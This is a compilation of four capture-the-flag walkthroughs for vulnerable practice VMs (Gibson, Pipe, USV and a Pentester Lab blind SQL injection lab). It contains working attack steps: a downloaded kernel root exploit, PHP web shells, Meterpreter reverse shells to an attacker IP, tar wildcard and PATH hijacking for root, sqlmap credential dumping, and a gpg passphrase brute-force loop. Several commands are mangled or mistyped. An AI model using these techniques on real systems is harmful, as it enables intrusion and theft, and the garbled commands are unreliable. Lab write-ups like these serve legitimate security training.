Hack the Gibson VM (CTF Challenge)

It’s a boot2root challenge and it does not get over with getting root access. You have to find flag also. So let’s start.

First of all download lab from https://download.vulnhub.com/gibson/gibson.ova

Now open kali terminal and like always start with first step i.e. netdiscover

netdiscover

it shows all the hosts those are up in our network and from here we get our target ip.

Target IP: 192.168.1.6

As our target is all set we are going to scan it with nmap which will show all the open ports. In this case open ports are only two i.e. 22 and 80.

nmap –p- -A 192.168.1.6

As from the above result we have got 80 port open so we will open target ip in browser. It shows an accessible directory. Let’s try opening it as we cannot see anything important here.

Oh no such luck with this also. It’s written the result will be found by brute force but there is no place where we can apply brute force.

As we do not have any other option so let’s just go to view page source to see if we could get any clue to move further in our task. Right click on page and choose view page source. Great, we have password god for margo

Now from our nmap result we have got port 22 open which is for ssh login. So open it in kali terminal

sshmargo@192.168.1.6

And password is god which we got from last result. Good we have access of our lab now.

Our next step is to find the kernel version of lab and for that type

lsb_release–a

it gives that Ubuntu 14.04 is used and to get the root access of  lab, we will use the particular exploit made for this kernel version i.e. 39166. So first download it and then compile by command

gcc 39166 –o 39166

after compiling copy it to var/www/html now run the commands given below to get root access

cd /tmp

wgethttp://192.168.1.7/39166

chmod 777 39166

./39166

As we have root access, finally first challenge is completed. Now it’s time to find the flag.

Now we are in root so we will download LinEnum.sh zip file to get the better access of Linux and privilege escalation. After unzipping it, move in to folder and just copy LinEnum.sh file to var/www/html. Perform the following commands with ip of kali linux

wgethttp://192.268.1.7/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh

It shows all the services running.

Here we get some interesting file which is highlighted in below image. It shows some external server is running.

Now from the process list we see something like ftpserv so we can just search based on that.

Find / -name ftpserv*

Awesome it gives us aftpserv.img file which can prove to be a useful thing.

Now I copied this ftpserv.img file for easy downloading.

Cp /var/lib/libvirt/images/ftpserv.img /var/www/html

Chmod 777  /var/www/hmtl/ftpserv.img

Here I downloaded that ftpserv.img file in my kali linux.

wget http://192.168.1.6/ftpserv.img

This time I have checked the file type of downloaded file and then extracted it

fileftpserv.img

losetup /dev/loop0 /root/ftvserv.img -0 $((63*512))

It extracted the ftpserv.img  and it has some files inside it. When I opened garbage folder there I saw a flag.img file which is what we need i.e. flag.

Open garbage folder in terminal and make directory flag for extracting flag.img in it.

mkdir flag

mount –t ext2 flag.img flag

now I open flag folder and here I could see all extracted data of flag.img even hidden files also.

cd flag

ls –la

from the list of files I open .trash folder

cd .trash

ls –la

and here we can see that finally we got our flag but it’s in other file type so let’s check it

file flag.txt.gpg

this shows that task is not completed yet and we still have encrypted flag.

Though we have our flag but we do not have key for decryption. So looking around it I found a hint.txt file of flag which probably could have key to open it. So let’s open it

cat hint.txt

Here we can see that it gives 2 links.

Now we open the above links in Firefox browser. And we get 2 movies which has only one thing in common i.e. actor jonny lee miller.

After doing Google search about these movies and jonny lee miler I came to know that in hacker’s movie he has aliases like zerocool, crash over ride etc. so by using cup software I created a dictionary. By running following command in .trash folder. Simultaneously it’s decrypting our encrypted flag also.

for x in $( cat /root/Desktop/cup/zerocool.txt) ; do

>echo [x] trying $x

>gpg –output flag.txt –passphrase $x –decrypt flag.txt.gpg

>done

At the bottom it gives that flag.txt exists.

Now again running ls command it reflects off flag.txt file which is basically our flag. So at last type the given command.

cat flag.txt

Fantastic, after all the difficulties we successfully got our flag.

Author: Shailesh Kumar is a passionate Researcher and Technical Writer at Hacking Articles. he is a hacking enthusiast.

Hack the Pipe VM (CTF Challenge)

PIPE is another CTF which gives you a platform to enhance your penetration testing skills. So let’s not waste any more time and get started with it.

First of all download pipe lab from here

Like always our first step would be to run netdiscover command to see the active hosts in our network.

netdiscover

Target IP: 192.168.0.103

As we have target IP so we will do nmap scan to see if there are any ports active for further penetration.

nmap –p- -A 192.168.0.103

And from here we get open ports 22, 80, 111, 54073.

Now we will open target IP in browser as port 80 is active. Here the website reflects off unauthorized message with a login page. On login window it written “the site says: index.php” which we will be using later on.

Now using burpsuite we are going to capture the cookies for login page by setting manual proxy of firefox browser. It has intercepted data for login page. Changes are to be made in GET parameter in to get authentication.

HACK / index.php

After this step, forward request to the browser for execution of process and finally getting into website. Ok! To above step leads us to website which shows a PIPE picture and a link below it to get artist info.

As we cannot see anything else on this web page so right click anywhere on page and choose view page source. It shows an accessible directory scriptz in its script content.

Now open target ip with scriptz in browser.

192.168.0.103/scriptz/

Oh! Look at that we found an accessible directory.

We will first open log.php.BAK file and see if we get some information to go further or not. And see what it shows. It seems that this file will write itself on the webroot directory. This is very interesting to us especially if we can control the `data` field supplied to the file.

cat log.php.bak

Now again returning to our original web page and simultaneously start burp suite by setting manual proxy for it. Click on the link given below image and capture cookies that request in burp.

Here we have the intercepted data in burp window which shows the parameter used for above web page.

After above step right click on this window and list of some options will appear choose sent to repeater and as a result 2 windows will get opened one for request and one for response.

Select the parameter in request tab and send it for decoding in smart decoder. This can be done by right clicking on selected text and then sending it to decoder. Now select decoder tab from above menu and choose smart decoder from left side menu. In the image below red highlighted text is decoded and result is shown in below window the code which is given in bottom window need to be altered so that we can upload our malicious code.

Now going back to our intercept window we see that our earlier parameter is decoded where we can make changes according to our requirements. So the changes are as follows.

0:4->0:3, Info->log, s->8, id->filename, s->31

Then give the path of file i.e. /var/www/html/scriptz/shell.php

s->4, rene->data, s->60

and then code which is to be executed i.e. <?php echo ‘<pre>’ ; system($_GET[‘cmd’]) ; echo ‘</pre>’;?>”;)

Now forward the request to browser.

Great our shell.php file is uploaded in that accessible directory.

Now we have uploaded shell it’s time to open it see what it gives us. As we have executed the code for cmd, we will type cmd in URL as well.

cmd=id

It shows the following data in the command we executed.

uid=33(www-data) gid=33(www-data) groups=33(www-data)

That’s the game! It’s time to exploit through shell that we have uploaded in accessible directory.

Now open terminal in kali Linux and proceed to Metasploit by typing msfconsole.

Thereafter find the exploits for search web_delivery and use the exploit followed by set target, payload, lhost, lport and run exploit.

Use exploit/multi/script/web_delivery

Show targets

Set target 2

Set lhost 192.168.0.104

Set lport 4444

Set payload php/meterpreter/reverse_tcp

run

At last when all the commands are executed, it will provide a code at the bottom of image.

Now again copy the code which we get as a result and paste it in URL after cmd and execute it.

As soon as we execute the code in URL we will get meterpreter session of our target i.e. PIPE

Now we will go to shell by typing

Shell

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Our next step is to find the kernel version of Ubuntu. TO know the said type: lsb_release -a

We check for any cronjobs running on the system via cat /etc/crontab we can see a couple of cron jobs running which interest us.

In /etc/crontab the script /usr/bin/compress.sh which is world readable now follow the following steps

Now time to do some magic follow the following steps

Cd /home/rene/backup

Echo ‘cp /root/flag.txt;chmod –r /tmp/flag.txt’ > flag.sh

Touch /home/rene/backup/–checkpoint=1

Touch /home/rene/backup/–checkpoint=-action=exec=sh\ flag.sh

Cd /tmp

At last open this flag.txt file and we have our flag. Mission accomplished!

Author: Shailesh Kumar is a passionate Researcher and Technical Writer at Hacking Articles. he is a hacking enthusiast.

Hack the USV VM (CTF Challenge)

A new challenge for all of you guys!

This CTF is all about conquering flags coming across our way as we go further in our penetration testing of this lab.  All the flags should be discovered in form of: Country name Flag:[md5 hash]. The network interface of this virtual machine will take it’s IP settings from DHCP.

Download lab from here : https://www.vulnhub.com/entry/usv-2016-v101,175/

Let’s get started with our first step.

netdiscover

From this we get our target IP.

Target IP: 192.168.0.103

Now we will scan it with nmap which will give us all the open ports in particular lab for further penetration testing.

nmap –p- -A 192.168.0.103

This result shows that following ports are open 22 , 80 , 3129 , 3306 , 21211 and http proxy is used on port 3129.

So now lets proceed with further penetration testing. Firstly we’ll go with ssh on port 22.

ssh 192.168.0.103

Ssh revealed a ascii Dragon with some strings and a base64 code written at bottom. Looking closer you’ll see something written on top AES-ECB.

By Google search we found out that there is a website called aesencryption.net where we can decrypt the base64 code we got in our last result. So we will decrypt that code with the given key in image by all this process we arrived at our 1st flag i.e ITALY FLAG

Ok so now let’s head towards second flag and for that we are going to open target IP in browser as port 80 is also open. Look at that. We got access forbidden. No result.

As we opened target ip in browser simultaneously we have captured the cookies through burp suite after setting the manual proxy in browser. When all this is done, right click on its window where intercepted data is fetched and a kind of action list will put on view further click to send to repeater.

Look over screenshot below you will find two panel left and right for request and response respectively. In the response window the highlighted text is our flag.

As this code is in base64 so we are going to use HackBar plugin in Mozilla firefox which is preinstalled or can be easily installed. Whoa decoding the code in it we got another flag which is our second flag i.e. CROATIA FLAG

Moving ahead, from our nmap result we got that http-proxy is set on port 3129 so we will set proxy setting for our target IP with port number 3129 as shown below.

Now try opening target IP in browser and wait for few seconds like 10 sec. The proxy setting did the trick and website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Some of you may be aware of this but for those who do not know about this. It is Games of Thrones.

The site didn’t show much so I used nikto scanner with proxy to get some information about it which will be helpful in further testing.

nikto –h 192.168.0.103 –useproxy  http://192.168.0.103:3129

It reveals a wordpress login at /blog.

Ok!  Now open it in browser. Great, Games of Thrones notion is confirmed as Seven Kingdoms blog is shown.

Scrolling down in this site you can see that there is an interesting second post which shows ‘I have a message for you’. There is a highlighted option so jst try to open it in browser.

Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.

Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at bottom.

Here we decrypt the code in the hackbar plugin which results in another flag. From this step we got our third flag i.e. PORTUGAL FLAG

 Now , returning to previous site there are several post which are all useless so just scroll down to see if there is something useful or not  and then comes a last post which is of our interest.

‘Protected: the secret chapter ‘

Oh! We have to provide a password to get through it. This one took some time and to spare your time I won’t go through my failures,

I have created dictionary of possible passwords which are nothing but some of the words in this whole page with the help of following command.

cewl –d 2 –m 5 –proxy_host 192.168.0.103 –proxy_port 3129 –w /root/Desktop/dict.txt http://192.168.0.103/blog/

From the list we get that password is ‘westerosi’

Using this password we came to another page which revealed another flag in base64 encoded string and below it some kind of images of an actress.

 Now again decrypt it in and as a result we have our fourth flag i.e. PARAGUAY FLAG

Moving to one level up, from site we got another message that “the mother_of_dragons has a password which is in right front of your eyes”.

Knowing nothing about the eyes of actress I restored to google to see if I get any clue from there but no such luck.

I looked at the message again and it states ‘password which is in front of your eyes’

That’s the password of mother_of_dragons is ‘in front of your eyes’. But wait a minute where is this password is used.

We have ftp service running. So let’s try and get through it

ftp 192.168.0.103 21211

ls –al

get .note.txt

exit

cat .note.txt

bingo! Here that password is used. At the bottom result shows that children’s name is used for password. Again a password but this time it is used for wordpress login which we are going to use in coming steps.

gain I googled and found out she doesn’t had any children rather had 3 dragons named Drogon , Rhaegal and Viserion. So I put all these names into a file along with all possible combinations.

List is small so by entering each one the desired password could be find out.

Password is RhaegalDrogonViserion

Apply the credentials for wordpress and we are in!

Looking around the site I found the profile section which reveals the base64 encoded string for mother_of_dragons.

Like always decode the base64 code in HackBar and here we have another flag.

This is our fifth flag i.e. THAILAND FLAG

Now with only 2 flags left its time for shell access as we have wordpress.

Moving further, firstly make a php code through msfvenom which can be used to get the meterpreter session.

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 –f raw

Being admin of the site I am able to edit the theme. So I replaced the 404.php code of template in Viking theme with the above highlighted php code.

On the other side to get the meterpreter session open kali terminal and run multi handler. And for that type the following commands.

Use exploit/multi/handler

Set payload php/meterpreter/reverse_tcp

Set lhost=192.168.0.103

Set lport=4444

exploit

as we have meterpreter session ,now go to shell and type following commands

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

cd /srv/http

ls

it shows a reward_flag.txt file so call it with cat command

cat reward_flag.txt

As a result we get a base64 encoded string.

Do not worry soon this decoding thing is going to over as we have sixth flag with this decoding. So as a result our sixth flag is MONGOLIA FLAG

Back to another file in above list of files i.e. winterfell_messenger .  We see its executable and owner is root. So run it with following command

./winterfell_messenger

Cat: /root/message.txt

It shows that it’s using cat command to read a file in the /root directory.

Using strings shows that cat command is being used; however it’s not using the full path to the program. From this we come to know that it will search for set PATH to run.

 Now, we are able to update PATH by using export but first we need to find out the writable directory and for that we have used /tmp. In /tmp we will create an executable file named cat so it can be called by the winterfell_messenger program. This file will be running as root so we will use /bin/bash to call shell and to change the mode. Run the following commands.

echo “ /bin/bash” > /tmp/cat

chmod 777 /tmp/cat

echo $PATH

/usr/local/sbin: /usr/local/bin:/usr/sbin:/usr/bin

After this step we are going to update the PATH to remove the /tmp directory  we added. For this type the following commands.

Export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

<p:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

Now, we will go to the home directory of http to get the desired file . For that type

cd  /srv/http

ls

now  call the winterfell_messenger file by using given command.

./winterfell_message

id

Now go to root and there we have .flag.txt file.

Now running cat against .flag.txt we get a congratulations, a wolf made up of ascii characters and a base64 encoded string at the bottom. Commands are given below.

 cd /root

/usr/sbin/cat .flag.txt

Finally decoding in hackbar reveals seventh and last flag which is nothing but the SOMALIA FLAG

Whoola. We reached at the end and with this job is done. Hope you enjoyed it and obviously penetration skills are refreshed.

Author: Priya Singh is a enthusiast researcher and technical writer at hacking articles. Contact here

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Today we are going to perform penetration testing with part II of previous lab, download it frohere. Now install the iso image in VM ware and start it. In this lab task level is intermediate and challenge is to gain access of administration console and then upload a PHP webshell.

Start Kali Linux then open the terminal and type netdiscover command for scanning network. Here 192.168.1.102 is my target IP which is shown in the screenshot. Now explore this IP in browser.

When you will open target IP in browser you will get a web page having heading My Awesome Photoblog. On the top of left side it contains some tags: home; test; ruxcon; 2010; all pictures; admin. Now Click on test.

The given URL: http://192.168.1.102/cat.php?id=1 will run sql query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding(‘) apostrophe at last of URL:

http://192.168.1.102/cat.php?id=1as it is not vulnerable. I didn’t get any error message like I have got in its part 1then I try to find out whether the other IDs is vulnerable or not but here also I found nothing. 

Now use nikto to scan the target for any vulnerability and type following command.

Nikto –h 192.168.1.102

 Look over the highlighted part in screenshot; from the result, it tells that X-Content-Type-Option header is not set.

Then I had used acunetix to scan the target which has declared the level of threat is high for blind sql injection.

Hence it is clear that exploit the target through sql injection.

Now type the following command for blind sql injection using sqlmap

sqlmap -u “http://192.168.1.102/cat.php?id=1″ –headers=”X-Forwarded-For: *” –dbs –batch

 Now try sql injection for header; the target application might be designed with X-Forwarded-For header which is used to run application behind a reverse-proxy.

Our assumption is correct above header is vulnerable to sql injection and I have got database name photoblog.

Now let’s fetch entire data under photoblog database through following command:

sqlmap -u “http://192.168.1.102/cat.php?id=1″ –headers=”X-Forwarded-For: *” –D photoblog –dump-all –batch

Here Task was to gain access of administration console for which we required the login: password of his account. Through sqlmap command we have got login as admin and password as P4ssw0rd.

Now try to use above credential to access administration console, again open target IP: 192.168.1.102 in browser and click on admin tab present on the top of left side and type login as admin and password as P4ssw0rd.

Congrats!!! The first task is completed.

Now last task is to upload a PHP webshell. Under administration console you will notice a link Add a new picture for uploading an image in this web server. Click on Add a new picture to upload image.

Here we can upload image through Add option now I will try to upload PHP webshell

I try to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.

Then I had used exiftool for hiding the malicious code inside the png image. For this step you need to download an image and save it on desktop now prepare a php file by typing following malicious code in a text file to create command injection vulnerability and save it with .php extension as I have saved with raj.php on the desktop.

<?php $cmd=$GET[‘cmd’]; system($cmd); ?>

 Now type command for exiftool to hide malicious code of php file inside the png image

Cd Desktop

Exiftool “-comment<=raj.php” 1.png

Exiftool 1.png

 From screenshot you can perceive I have three files on desktop one for php as raj.php another for downloaded image as 1.png original and third php webshell as 1.png

Now I had browse 1.png to add it as new image which is our php webshell.

Our malicious file successfully uploaded on web server. You can see a new row is added as webshell php which contains our backdoor raj.php, now click on webshell php.

Here is our malicious image; now right click on it and click view image tag.

Here this image will get opened in separate window and if you remembered its contains malicious code of command injection.

Here I try to execute ls command by adding /cmd.php?cmd=ls/etc at the end of the URL and from screenshot you can analysis this page is encoded.

Now last option is to use repeater under burp suite to execute the commands. Start burp suite and set manual proxy of browser then open the web page where “you are hacked image” is uploaded.

Now capture the cookies through burp suit and sent the intercepted data to repeater option by making right click on its window.

Now change the header from /show.php?id=4 into /admin/uploads/1484502823.png/cmd.php?cmd=ls now click on GO tab to send this request for getting response and when you will scroll down  (response) here I found some information through ls command.

Great!!!  We have completed both tasks.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...